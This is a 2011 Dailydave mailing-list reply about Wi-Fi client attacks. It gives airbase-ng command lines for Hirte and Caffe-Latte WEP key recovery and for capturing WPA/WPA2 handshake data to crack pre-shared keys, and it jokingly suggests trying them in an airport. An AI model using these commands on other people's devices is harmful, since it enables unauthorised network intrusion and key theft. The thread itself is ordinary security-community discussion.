On 2 December 2011 15:39, Dave Aitel <[email protected]> wrote: > It's not a new attack - the key thing with SILICA is that people can > actually USE it. Although it's possible that aircrackNG is easier to use > than I'm giving it credit for - have you tried it lately with this attack? I have never used SILCIA send me a licence and ill give it a go ;)
I have used the cfrag attack with aircrack before. im not on a system to test right now. but i believe the magic incarnation is below (you may need to also specify the client mac). The magic bit being the -N flag (-L for caffe-Late) #wep40 airbase-ng -N -W 1 -c [channel] -z 1 -P mon0 #wep104 airbase-ng -N -W 1 -c [channel] -z 4 -P mon1 worth mentioning that you can also run the following to to get a valid mic for a given snounce, anounce, client mac and client AP.which should allow you to [attempt to] crack a WPA PSK #WPA (and this is of the top of my head so be kind if i miss an option) airbase-ng -N -c [channel] -z 2 -P mon2 #WPA2 airbase-ng -N -c [channel] -z 4 -P mon3 Run all of the above in an airport an see what you get :) Personally i have never found aircrack to difficult to use, run it with the wrong arguments and it genrally tells you which ones it thinks you should be using. I also see the benefit of an integrated GUI that dose all the thinking for you > Of course, not all of your boxes are vulnerable to this sort of thing. > Phones, in a turn of fate, are usually immune. could you elaborate on this I find phones can often be the worst offenders. these attacks genrally rely on the fact that unconnected devices constantly probe for networks they "know about". The iPhone and i suspect other ios devices dont allow you to remove networks unless you are in range of them. however i guess they do turn of wifi to preserve batteries, i guess this is what you mean? _______________________________________________ Dailydave mailing list [email protected] https://lists.immunityinc.com/mailman/listinfo/dailydave
